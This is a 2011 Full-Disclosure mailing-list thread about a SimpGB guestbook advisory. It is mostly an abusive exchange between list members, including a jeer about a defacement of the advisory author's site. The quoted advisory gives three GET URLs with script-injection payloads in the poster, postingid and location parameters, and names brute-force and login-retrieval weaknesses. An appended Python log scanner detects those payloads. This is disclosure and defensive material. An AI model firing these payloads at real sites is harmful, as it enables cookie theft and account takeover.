Date: Mon, 7 Feb 2011 07:00:58 +0000
From: "Cal Leeming [Simplicity Media Ltd]"
	<cal.leeming@...plicitymedialtd.co.uk>
To: laurent.gaffie@...il.com
Cc: full-disclosure@...ts.grok.org.uk, MustLive <mustlive@...security.com.ua>
Subject: Re: Multiple vulnerabilities in SimpGB

I think it's time for a group hug :|

On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru <antisnatchor@...il.com> wrote:

>  ahaah.
> Nice reply Sparky.
> MustLive, seems you've been defaced :-)
>
> antisnatchor
>
>  ------------------------------
>
>    laurent gaffie <laurent.gaffie@...il.com>
> February 5, 2011 3:36 AM
>
> Hey Sparky,
>
> One of the many, many things you didn't understand during the past 5 years is
> that you should probably try to identify and fix your stuff on *your*
> website, before spamming this ML with your crap.
> cf:
> http://www.zone-h.org/mirror/id/11367858
>
> e-tard.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ------------------------------
>
>    MustLive <mustlive@...security.com.ua>
> February 4, 2011 10:49 PM
>
> Hello Laurent!
>
> You are a very "intelligent" man, as I see from this and your previous letter
> (in 2010).
>
> You need to take into account the next:
>
> 1. I know better where to send.
>
> 2. If you write shitty stuff, then it doesn't mean that others do the same.
>
> 3. No need to think and state instead of other people - if it's not
> interesting for you, then it can be interesting for others.
>
> 4. The main and obvious thing is that I write all my advisories from 2006
> for those people who are interested in them (and there are such people, as I
> know for sure). So if you or anybody else is not interested in them, just
> skip them (and don't need to write me nonsenses) - I'm writing my letters
> not for you, but for others who are interested in them and who thank me for
> my work. It's strange that such an "intelligent" man as you didn't understand
> it for the last five years :-).
>
> 5. I don't need any not serious letters from you, so don't waste your time
> writing me anymore, because I've put your e-mail into blacklist. Spend your
> time for good things.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ----- Original Message -----
> From: laurent gaffie
> To: MustLive
> Cc: full-disclosure@...ts.grok.org.uk ; bugtraq@...urityfocus.com
> Sent: Wednesday, January 26, 2011 5:09 PM
> Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
>
>
> Send your shitty stuff to bugtraq@...urityfocus.com
>
> If it's not obvious, no one gives a shit here, seriously.
>
>
>
> 2011/1/27 MustLive <mustlive@...security.com.ua>
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If a captcha is used in the
> guestbook, then a working captcha code is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
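The following Python is an added example, not part of the thread and not SimpGB code. It scans web server access-log lines for preview requests to guestbook.php whose poster, postingid or location values decode to HTML markup, as in the GET URLs of the quoted advisory. The log format, the sample lines and the assumption that postingid is normally numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as reflected by the Preview function.
REFLECTED_PARAMS = ("poster", "postingid", "location")
# Characters that let a value leave HTML text or a double-quoted attribute.
MARKUP = re.compile(r'[<>"]')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return {param: decoded value} for preview requests carrying markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("/guestbook.php"):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes
    if "preview" not in query:
        return {}
    hits = {}
    for name in REFLECTED_PARAMS:
        for value in query.get(name, []):
            # Assumption: postingid is a plain number in legitimate use.
            bad_id = name == "postingid" and value and not value.isdigit()
            if MARKUP.search(value) or bad_id:
                hits[name] = value
    return hits


def scan(log_lines):
    """Return [(line_number, hits)] for the log lines that match."""
    found = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            found.append((number, hits))
    return found


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Feb/2011:07:00:58 +0000] "GET /guestbook.php?mode=add&postingid=1&poster=Anna&location=Kyiv&preview=preview HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Feb/2011:07:01:02 +0000] "GET /guestbook.php?mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&preview=preview HTTP/1.1" 200 5180',
    '192.0.2.44 - - [07/Feb/2011:07:01:09 +0000] "GET /guestbook.php?mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&preview=preview HTTP/1.1" 200 5201',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

Only the GET variant shows up in access logs; the POST variant the advisory describes needs request-body inspection, for example at a reverse proxy.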
